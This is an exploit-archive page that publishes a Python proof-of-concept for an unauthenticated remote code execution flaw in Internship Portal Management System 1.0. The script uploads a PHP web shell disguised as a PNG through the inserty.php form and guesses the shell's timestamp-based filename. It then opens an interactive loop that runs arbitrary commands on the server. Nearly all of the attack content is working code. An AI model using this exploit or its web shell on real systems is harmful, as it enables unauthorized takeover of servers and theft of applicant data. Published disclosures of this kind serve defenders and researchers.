Internship Portal Management System 1.0 Shell Upload

Internship Portal Management System 1.0 Shell Upload: Posted May 4, 2021; Authored by argenestel; Internship Portal Management System version 1.0 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | a26e07c3c15a7e99b5879614246345b3ac6c2054fadbb7ac46f7d54e552cade0; Download | Favorite | View

Internship Portal Management System 1.0 Shell Upload

# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10

import requests
import time

#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
 "http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'

#the upload point
insert_url=url+"/inserty.php"

def fill_details():
    global payload
    global shellend
    global shellstart
    print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
    #time start
    shellstart=int(time.time())
    #print(shellstart)
    files  = {'file':('shell.php',payload,
                    'image/png', {'Content-Disposition': 'form-data'}
                  )
              }
    data = {
            "company_name":"some",
            "first_name":"some",
            "last_name":"some",
            "email":"some@some.com",
            "gender":"Male",
            "insert_button":"Apply",
            "terms":"on"
    }
    r = requests.post(insert_url, data=data, files=files)
    if r.status_code == 200:
        print("Exploited Intern System Successfully...")
        shellend = int(time.time())
        #print(shellend)
        shell()
    else:
        print("Exploit Failed")

def shell():
    for shellname in range(shellstart, shellend+1):
        shellstr=str(shellname)
        shell_url=url+"/upload/"+shellstr+"_shell.php"
        r = requests.get(shell_url)
        if r.status_code == 200:
            shell_url=url+"/upload/"+shellstr+"_shell.php"
            break
    
    r = requests.get(shell_url)
    if r.status_code == 200:
        print("Shell Starting...")
        while True:
            cmd=input("cmd$ ")
            r = requests.get(shell_url+"?cmd="+cmd)
            print(r.text)
    else:
        print("File Name Error")


fill_details()

Top Authors In Last 30 Days

Red Hat 277 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 66 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Debian 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,107)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,764)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,813)
UNIX (9,453)
UnixWare (188)
Windows (6,765)
Other

Internship Portal Management System 1.0 Shell Upload

Internship Portal Management System 1.0 Shell Upload

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Internship Portal Management System 1.0 Shell Upload

Share This

Internship Portal Management System 1.0 Shell Upload

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems